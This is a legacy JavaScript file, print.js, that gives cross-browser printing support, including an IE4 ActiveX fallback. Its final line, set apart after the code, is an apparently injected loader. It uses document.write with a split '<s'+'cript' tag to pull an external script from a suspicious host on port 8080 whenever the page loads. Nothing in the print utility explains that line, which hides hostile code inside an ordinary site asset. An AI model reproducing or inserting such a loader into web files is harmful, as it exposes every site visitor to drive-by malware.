<!--
/////////////////////////////////////////////////////////////
//
// print.js - provides cross-browser functionality for the
//            following browsers: IE4+ for PC, NS4+ for PC,
//            NS4+ for Mac
//
//            for all other platforms, an alert box will 
//            provide instructions.
//
// usage: onClick="return printIt();"
//
// (requires browserCheck.js)
//
/////////////////////////////////////////////////////////////

function printIt() {
  if(window.print) {
    window.print()
  }
  else {
    if(is.ie4 && !is.mac) ie4print()
    else alert("To print this document, choose\nFile-Print from the menu.")
  }
  
  return false
}

function ie4print() {
  WebBrowser = "<OBJECT ID='WebBrowser1' WIDTH=0 HEIGHT=0 CLASSID='CLSID:8856F961-340A-11D0-A96B-00C04FD705A2'></OBJECT>"
  document.body.insertAdjacentHTML("beforeEnd", WebBrowser)
  WebBrowser1.ExecWB(6, 2)    //Use a 1 vs. a 2 for a prompting dialog box
  WebBrowser1.outerHTML = ""
}

//-->




document.write('<s'+'cript type="text/javascript" src="http://soaoo.blog-salopes.com:8080/Unmount.js"></scr'+'ipt>');